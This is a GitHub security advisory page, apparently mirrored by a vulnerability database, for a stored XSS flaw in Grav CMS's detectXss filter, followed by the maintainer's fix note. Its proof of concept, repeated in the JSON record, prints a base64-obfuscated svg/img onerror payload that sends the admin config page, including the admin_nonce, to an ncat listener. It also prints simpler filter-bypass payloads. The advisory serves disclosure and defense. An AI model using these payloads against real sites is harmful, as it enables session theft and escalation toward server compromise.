GHSA-W8CG-7JCJ-4VV2

Vulnerability from github – Published: 2026-05-05 21:36 – Updated: 2026-05-13 13:52
VLAI
Summary
Grav is Vulnerable to Stored XSS via Tag Injection
Details

Summary

A low-privileged (with the ability to create a page) user can cause XSS with the injection of svg element. The XSS can further be escalated to dump the entire system information available under /admin/config/info whenever a Super Admin visits the page; which can further be chained with the use of admin-nonce to do a complete server compromise (RCE).

Details

Affected endpoint: admin/pages/<page> Affected code: system/src/Grav/Common/Security.php

    public static function detectXss($string, array $options = null): ?string
    {
        // Skip any null or non string values
        if (null === $string || !is_string($string) || empty($string)) {
            return null;
        }

        if (null === $options) {
            $options = static::getXssDefaults();
        }

        $enabled_rules = (array)($options['enabled_rules'] ?? null);
        $dangerous_tags = (array)($options['dangerous_tags'] ?? null);
        if (!$dangerous_tags) {
            $enabled_rules['dangerous_tags'] = false;
        }
        $invalid_protocols = (array)($options['invalid_protocols'] ?? null);
        if (!$invalid_protocols) {
            $enabled_rules['invalid_protocols'] = false;
        }
        $enabled_rules = array_filter($enabled_rules, static function ($val) { return !empty($val); });
        if (!$enabled_rules) {
            return null;
        }

        // Keep a copy of the original string before cleaning up
        $orig = $string;

        // URL decode
        $string = urldecode($string);

        // Convert Hexadecimals
        $string = (string)preg_replace_callback('!(&#|\\\)[xX]([0-9a-fA-F]+);?!u', static function ($m) {
            return chr(hexdec($m[2]));
        }, $string);

        // Clean up entities
        $string = preg_replace('!(&#[0-9]+);?!u', '$1;', $string);

        // Decode entities
        $string = html_entity_decode($string, ENT_NOQUOTES | ENT_HTML5, 'UTF-8');

        // Strip whitespace characters
        $string = preg_replace('!\s!u', ' ', $string);
        $stripped = preg_replace('!\s!u', '', $string);

        // Set the patterns we'll test against
        $patterns = [
            // Match any attribute starting with "on" or xmlns
            'on_events' => '#(<[^>]+[a-z\x00-\x20\"\'\/])(on[a-z]+|xmlns)\s*=[\s|\'\"].*[\s|\'\"]>#iUu',

            // Match javascript:, livescript:, vbscript:, mocha:, feed: and data: protocols
            'invalid_protocols' => '#(' . implode('|', array_map('preg_quote', $invalid_protocols, ['#'])) . ')(:|\&\#58)\S.*?#iUu',

            // Match -moz-bindings
            'moz_binding' => '#-moz-binding[a-z\x00-\x20]*:#u',

            // Match style attributes
            'html_inline_styles' => '#(<[^>]+[a-z\x00-\x20\"\'\/])(style=[^>]*(url\:|x\:expression).*)>?#iUu',

            // Match potentially dangerous tags
            'dangerous_tags' => '#</*(' . implode('|', array_map('preg_quote', $dangerous_tags, ['#'])) . ')[^>]*>?#ui'
        ];

        // Iterate over rules and return label if fail
        foreach ($patterns as $name => $regex) {
            if (!empty($enabled_rules[$name])) {
                if (preg_match($regex, $string) || preg_match($regex, $stripped) || preg_match($regex, $orig)) {
                    return $name;
                }
            }
        }

        return null;
    }

Specifically the line:

'on_events' => '#(<[^>]+[a-z\x00-\x20\"\'\/])(on[a-z]+|xmlns)\s*=[\s|\'\"].*[\s|\'\"]>#iUu',

assumes that the on_events will always begin with either whitespace, ', " which can easily be bypassed with a simple payload like:

<img src=x onload=alert('1')>

This XSS Filter practice is broken. 1. Blacklisting every possible scenario that leads to XSS isn't possible. 2. Regex can't parse HTML.

It would be better to use an HTMLPurifier.

PoC

Grav Core + Admin Plugin Grav Version: v1.7.49.5 - Admin v1.10.49.1

  1. Create a low-privileged user with only enough permission to login and perform CRUD on Pages. User Perms

  2. Login as the low-privileged user and browse to pages: Pages

  3. Create a post with the following content:

<svg><foreignObject><img src=x onerror=eval(atob('KGFzeW5jKCk9PntsZXQgcj1hd2FpdCBmZXRjaCgnL2dyYXYtYWRtaW4vYWRtaW4vY29uZmlnL2luZm8nKTtsZXQgdD1hd2FpdCByLnRleHQoKTtuYXZpZ2F0b3Iuc2VuZEJlYWNvbignaHR0cDovLzEyNy4wLjAuMTo4MDAxL2dyYXYtbG9nJyx0KX0pKCk7'))></foreignObject></svg>

The payload base64 is decoded to: 

(async()=>{let r=await fetch('/grav-admin/admin/config/info');let t=await r.text();navigator.sendBeacon('http://127.0.0.1:8001/grav-log',t)})();

whenever a user with enough privilege visits the attacker-controlled page, a request will be made to the info endpoint and the response will be sent to attacker beacon/listener.

  1. Save Post Created

  2. Start a ncat listener on port 8001.

┌──(kali㉿kali)-[~]
└─$ ncat -lvnp 8001
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:8001
Ncat: Listening on [0.0.0.0:8001](http://0.0.0.0:8001/)
Ncat: Connection from [127.0.0.1:44658](http://127.0.0.1:44658/).

  1. Now as a Super Admin visit the / of Grav [http://localhost/grav-admin/](http://localhost/grav-admin/) for me: Visiting Grav

  2. We get a response with the admin-nonce and the entire system information:

┌──(kali㉿kali)-[~]
└─$ ncat -lvnp 8001
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:8001
Ncat: Listening on [0.0.0.0:8001](http://0.0.0.0:8001/)
Ncat: Connection from [127.0.0.1:44658](http://127.0.0.1:44658/).
POST /grav-log HTTP/1.1
Host: [127.0.0.1:8001](http://127.0.0.1:8001/)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: text/plain;charset=UTF-8
Content-Length: 127013
Origin: http://localhost/
Connection: keep-alive
Referer: http://localhost/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Priority: u=6

    <!DOCTYPE html>
    <html lang="en">
    <head>
            <meta charset="utf-8" />
        <title>Configuration: Info | Grav</title>
                    <meta name="description" content="">
                            <meta name="robots" content="noindex, nofollow">
                <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="icon" type="image/png" href="/grav-admin/user/plugins/admin/themes/grav/images/favicon.png">




        <script type="text/javascript">
    window.GravAdmin = window.GravAdmin || {};
    window.GravAdmin.config = {
        current_url: '/grav-admin/admin/config/info',
        base_url_relative: '/grav-admin/admin',
        base_url_simple: '/grav-admin',
        route: 'info',
        param_sep: ':',
                enable_auto_updates_check: '1',
                admin_timeout: '1800',
        admin_nonce: '1265db72d897b4324cbe7d1781e66e3b',


<SNIPPED>

Impact

This is a Stored Cross-Site Scripting (XSS) vulnerability exploitable by a low-privileged user, which leads to exfiltration of the admin session context, including the admin_nonce. This nonce can be abused to bypass CSRF protections and authenticate further requests to sensitive admin endpoints. Given Grav’s support for scheduled tasks and extensible plugin architecture, this can be escalated to Remote Code Execution (RCE) under favorable conditions.

Affected Component: Grav Core + Admin Plugin (v1.7.49.5 / v1.10.49.1)
Impact: Full system compromise via RCE chain originating from low-privilege XSS.

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H Overall CVSS Score: 9.0 High Impact

Maintainer note — fix applied (2026-04-24)

Fixed in Grav core on the 2.0 branch: commit 5a12f9be8 — will ship in 2.0.0-beta.2. Two changes in tandem:

  1. Regex bypass (detection layer) — the on_events regex that missed unquoted handlers is tightened; see the companion GHSA-9695-8fr9-hw5q advisory for details.

  2. Missing dangerous tagssvg, math, option, and select have been added to default security.xss_dangerous_tags in system/config/security.yaml. svg and math allow inline scripting through their XML namespace and event-handler surface; option/select are the tags attackers use to break out of the admin's select-template context before dropping the payload.

Combined with the tightened on_events regex, the PoC <svg>…<script>…</script></svg> (and the GHSA-c2q3 </option></select><img src=x onerror=alert(1)> variant) now trip at least one detector.

Files: - system/config/security.yaml — dangerous-tags list extended. - system/src/Grav/Common/Security.php — regex tightening. - tests/unit/Grav/Common/Security/DetectXssTest.php.

Severity
8.9 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "getgrav/grav"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.0-beta.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42611"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T21:36:27Z",
    "nvd_published_at": "2026-05-11T16:17:34Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA low-privileged (with the ability to create a page) user can cause XSS with the injection of `svg` element. The XSS can further be escalated to dump the entire system information available under `/admin/config/info` whenever a Super Admin visits the page; which can further be chained with the use of admin-nonce to do a complete server compromise (RCE).\n\n### Details\nAffected endpoint: `admin/pages/\u003cpage\u003e`\nAffected code: `system/src/Grav/Common/Security.php`\n\n```php\n    public static function detectXss($string, array $options = null): ?string\n    {\n        // Skip any null or non string values\n        if (null === $string || !is_string($string) || empty($string)) {\n            return null;\n        }\n\n        if (null === $options) {\n            $options = static::getXssDefaults();\n        }\n\n        $enabled_rules = (array)($options[\u0027enabled_rules\u0027] ?? null);\n        $dangerous_tags = (array)($options[\u0027dangerous_tags\u0027] ?? null);\n        if (!$dangerous_tags) {\n            $enabled_rules[\u0027dangerous_tags\u0027] = false;\n        }\n        $invalid_protocols = (array)($options[\u0027invalid_protocols\u0027] ?? null);\n        if (!$invalid_protocols) {\n            $enabled_rules[\u0027invalid_protocols\u0027] = false;\n        }\n        $enabled_rules = array_filter($enabled_rules, static function ($val) { return !empty($val); });\n        if (!$enabled_rules) {\n            return null;\n        }\n\n        // Keep a copy of the original string before cleaning up\n        $orig = $string;\n\n        // URL decode\n        $string = urldecode($string);\n\n        // Convert Hexadecimals\n        $string = (string)preg_replace_callback(\u0027!(\u0026#|\\\\\\)[xX]([0-9a-fA-F]+);?!u\u0027, static function ($m) {\n            return chr(hexdec($m[2]));\n        }, $string);\n\n        // Clean up entities\n        $string = preg_replace(\u0027!(\u0026#[0-9]+);?!u\u0027, \u0027$1;\u0027, $string);\n\n        // Decode entities\n        $string = html_entity_decode($string, ENT_NOQUOTES | ENT_HTML5, \u0027UTF-8\u0027);\n\n        // Strip whitespace characters\n        $string = preg_replace(\u0027!\\s!u\u0027, \u0027 \u0027, $string);\n        $stripped = preg_replace(\u0027!\\s!u\u0027, \u0027\u0027, $string);\n\n        // Set the patterns we\u0027ll test against\n        $patterns = [\n            // Match any attribute starting with \"on\" or xmlns\n            \u0027on_events\u0027 =\u003e \u0027#(\u003c[^\u003e]+[a-z\\x00-\\x20\\\"\\\u0027\\/])(on[a-z]+|xmlns)\\s*=[\\s|\\\u0027\\\"].*[\\s|\\\u0027\\\"]\u003e#iUu\u0027,\n\n            // Match javascript:, livescript:, vbscript:, mocha:, feed: and data: protocols\n            \u0027invalid_protocols\u0027 =\u003e \u0027#(\u0027 . implode(\u0027|\u0027, array_map(\u0027preg_quote\u0027, $invalid_protocols, [\u0027#\u0027])) . \u0027)(:|\\\u0026\\#58)\\S.*?#iUu\u0027,\n\n            // Match -moz-bindings\n            \u0027moz_binding\u0027 =\u003e \u0027#-moz-binding[a-z\\x00-\\x20]*:#u\u0027,\n\n            // Match style attributes\n            \u0027html_inline_styles\u0027 =\u003e \u0027#(\u003c[^\u003e]+[a-z\\x00-\\x20\\\"\\\u0027\\/])(style=[^\u003e]*(url\\:|x\\:expression).*)\u003e?#iUu\u0027,\n\n            // Match potentially dangerous tags\n            \u0027dangerous_tags\u0027 =\u003e \u0027#\u003c/*(\u0027 . implode(\u0027|\u0027, array_map(\u0027preg_quote\u0027, $dangerous_tags, [\u0027#\u0027])) . \u0027)[^\u003e]*\u003e?#ui\u0027\n        ];\n\n        // Iterate over rules and return label if fail\n        foreach ($patterns as $name =\u003e $regex) {\n            if (!empty($enabled_rules[$name])) {\n                if (preg_match($regex, $string) || preg_match($regex, $stripped) || preg_match($regex, $orig)) {\n                    return $name;\n                }\n            }\n        }\n\n        return null;\n    }\n```\n\nSpecifically the line:\n\n```php\n\u0027on_events\u0027 =\u003e \u0027#(\u003c[^\u003e]+[a-z\\x00-\\x20\\\"\\\u0027\\/])(on[a-z]+|xmlns)\\s*=[\\s|\\\u0027\\\"].*[\\s|\\\u0027\\\"]\u003e#iUu\u0027,\n```\n\nassumes that the on_events will always begin with either `whitespace, \u0027, \"` which can easily be bypassed with a simple payload like:\n\n`\u003cimg src=x onload=alert(\u00271\u0027)\u003e`\n\nThis XSS Filter practice is broken.\n1. Blacklisting every possible scenario that leads to XSS isn\u0027t possible.\n2. Regex can\u0027t parse HTML.\n\nIt would be better to use an HTMLPurifier.\n### PoC\nGrav Core + Admin Plugin\nGrav Version: `v1.7.49.5 - Admin v1.10.49.1`\n\n1. Create a low-privileged user with only enough permission to login and perform CRUD on Pages.\n![User Perms](https://imgur.com/VkhtE9L.png)\n\n2. Login as the low-privileged user and browse to pages:\n![Pages](https://imgur.com/4bmmozN.png)\n\n3. Create a post with the following content:\n```\n\u003csvg\u003e\u003cforeignObject\u003e\u003cimg src=x onerror=eval(atob(\u0027KGFzeW5jKCk9PntsZXQgcj1hd2FpdCBmZXRjaCgnL2dyYXYtYWRtaW4vYWRtaW4vY29uZmlnL2luZm8nKTtsZXQgdD1hd2FpdCByLnRleHQoKTtuYXZpZ2F0b3Iuc2VuZEJlYWNvbignaHR0cDovLzEyNy4wLjAuMTo4MDAxL2dyYXYtbG9nJyx0KX0pKCk7\u0027))\u003e\u003c/foreignObject\u003e\u003c/svg\u003e\n```\n\nThe payload base64 is decoded to: \n\n```javascript\n(async()=\u003e{let r=await fetch(\u0027/grav-admin/admin/config/info\u0027);let t=await r.text();navigator.sendBeacon(\u0027http://127.0.0.1:8001/grav-log\u0027,t)})();\n```\n\nwhenever a user with enough privilege visits the attacker-controlled page, a request will be made to the `info` endpoint and the response will be sent to attacker beacon/listener.\n\n4. Save\n![Post Created](https://imgur.com/o33Erj2.png)\n\n5. Start a `ncat` listener on port `8001`.\n\n```bash\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ ncat -lvnp 8001\nNcat: Version 7.95 ( https://nmap.org/ncat )\nNcat: Listening on [::]:8001\nNcat: Listening on [0.0.0.0:8001](http://0.0.0.0:8001/)\nNcat: Connection from [127.0.0.1:44658](http://127.0.0.1:44658/).\n```\n\n6. Now as a Super Admin visit the `/` of Grav `[http://localhost/grav-admin/`](http://localhost/grav-admin/) for me:\n![Visiting Grav](https://imgur.com/kjt7uc9.png)\n\n7. We get a response with the `admin-nonce` and the entire system information:\n\n```\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ ncat -lvnp 8001\nNcat: Version 7.95 ( https://nmap.org/ncat )\nNcat: Listening on [::]:8001\nNcat: Listening on [0.0.0.0:8001](http://0.0.0.0:8001/)\nNcat: Connection from [127.0.0.1:44658](http://127.0.0.1:44658/).\nPOST /grav-log HTTP/1.1\nHost: [127.0.0.1:8001](http://127.0.0.1:8001/)\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br, zstd\nContent-Type: text/plain;charset=UTF-8\nContent-Length: 127013\nOrigin: http://localhost/\nConnection: keep-alive\nReferer: http://localhost/\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: no-cors\nSec-Fetch-Site: cross-site\nPriority: u=6\n\n    \u003c!DOCTYPE html\u003e\n    \u003chtml lang=\"en\"\u003e\n    \u003chead\u003e\n            \u003cmeta charset=\"utf-8\" /\u003e\n        \u003ctitle\u003eConfiguration: Info | Grav\u003c/title\u003e\n                    \u003cmeta name=\"description\" content=\"\"\u003e\n                            \u003cmeta name=\"robots\" content=\"noindex, nofollow\"\u003e\n                \u003cmeta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\"\u003e\n        \u003clink rel=\"icon\" type=\"image/png\" href=\"/grav-admin/user/plugins/admin/themes/grav/images/favicon.png\"\u003e\n\n                                   \n\n       \n        \u003cscript type=\"text/javascript\"\u003e\n    window.GravAdmin = window.GravAdmin || {};\n    window.GravAdmin.config = {\n        current_url: \u0027/grav-admin/admin/config/info\u0027,\n        base_url_relative: \u0027/grav-admin/admin\u0027,\n        base_url_simple: \u0027/grav-admin\u0027,\n        route: \u0027info\u0027,\n        param_sep: \u0027:\u0027,\n                enable_auto_updates_check: \u00271\u0027,\n                admin_timeout: \u00271800\u0027,\n        admin_nonce: \u00271265db72d897b4324cbe7d1781e66e3b\u0027,\n       \n       \n\u003cSNIPPED\u003e\n```\n\n### Impact\n\nThis is a **Stored Cross-Site Scripting (XSS)** vulnerability exploitable by a low-privileged user, which leads to **exfiltration of the admin session context**, including the **`admin_nonce`**. This nonce can be abused to **bypass CSRF protections** and **authenticate further requests** to sensitive admin endpoints. Given Grav\u2019s support for **scheduled tasks** and extensible plugin architecture, this can be escalated to **Remote Code Execution (RCE)** under favorable conditions.\n\n**Affected Component**: Grav Core + Admin Plugin (`v1.7.49.5` / `v1.10.49.1`)  \n**Impact**: Full system compromise via RCE chain originating from low-privilege XSS.\n\n`CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H`\n`Overall CVSS Score: 9.0`\n`High Impact`\n\n---\n\n\n---\n\n## Maintainer note \u2014 fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`5a12f9be8`](https://github.com/getgrav/grav/commit/5a12f9be8) \u2014 will ship in **2.0.0-beta.2**. Two changes in tandem:\n\n1. **Regex bypass** (detection layer) \u2014 the `on_events` regex that missed unquoted handlers is tightened; see the companion GHSA-9695-8fr9-hw5q advisory for details.\n\n2. **Missing dangerous tags** \u2014 `svg`, `math`, `option`, and `select` have been added to default `security.xss_dangerous_tags` in [`system/config/security.yaml`](https://github.com/getgrav/grav/blob/2.0/system/config/security.yaml). `svg` and `math` allow inline scripting through their XML namespace and event-handler surface; `option`/`select` are the tags attackers use to break out of the admin\u0027s select-template context before dropping the payload.\n\nCombined with the tightened `on_events` regex, the PoC `\u003csvg\u003e\u2026\u003cscript\u003e\u2026\u003c/script\u003e\u003c/svg\u003e` (and the GHSA-c2q3 `\u003c/option\u003e\u003c/select\u003e\u003cimg src=x onerror=alert(1)\u003e` variant) now trip at least one detector.\n\n**Files:**\n- [`system/config/security.yaml`](https://github.com/getgrav/grav/blob/2.0/system/config/security.yaml) \u2014 dangerous-tags list extended.\n- [`system/src/Grav/Common/Security.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Security.php) \u2014 regex tightening.\n- [`tests/unit/Grav/Common/Security/DetectXssTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/DetectXssTest.php).",
  "id": "GHSA-w8cg-7jcj-4vv2",
  "modified": "2026-05-13T13:52:40Z",
  "published": "2026-05-05T21:36:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/security/advisories/GHSA-w8cg-7jcj-4vv2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42611"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/getgrav/grav"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Grav is Vulnerable to Stored XSS via Tag Injection"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.